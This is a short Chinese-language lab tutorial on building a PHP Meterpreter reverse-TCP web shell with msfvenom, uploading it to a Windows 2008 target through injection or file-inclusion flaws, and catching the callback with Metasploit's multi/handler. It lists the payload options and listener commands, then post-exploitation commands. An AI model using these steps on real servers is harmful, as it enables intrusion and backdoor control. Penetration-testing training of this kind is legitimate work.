Metasploit有一个名为PHP Meterpreter的payload。这个模块可以创建具有Meterpreter功能的PHP Web shell。利用目标的漏洞（常见的注入和上传漏洞）之后，再把它的shell传到目标主机即可。

实验环境

系统:Kali2019
iP地址:192.168.1.15
使用工具: PHP Meterpreter

**目标主机
系统：Windows2008
iP地址:192.168.1.14

任务实施

使用Metasploit的msfvenom工具制作PHP Meterpreter**

-p:指定payload为php/meterpreter/reverse_tcp
-f:设置输出格式（raw）
LPORT：设定连接端口（默认4444）
LHOST：设定攻击主机的IP地址

完成以上操作后可使用ls查看后门文件是否生成成功

在通过正常途径，或者利用注入、远程文件包含漏洞等Web漏洞之后,将test2.php后门文件上传到目标服务器，接着启动msfconsole，使用以下命令设置监听。

使用use exploit/multi/handler命令设置模块

set payload php/meterpreter/reverse_tcp设置负载

set lhost 192.168.1.15 设置攻击机的ip地址

run开始运行

此时可以看到，我们的后门处于等待连接状态，这时候，任意一台主机去访问我们的刚刚上传的那个后门文件

回到msf下面，可以看见服务端已经反弹成功了，成功拿到shell。

最后使用sysinfo和getuid等meterpreter命令渗透目标主机。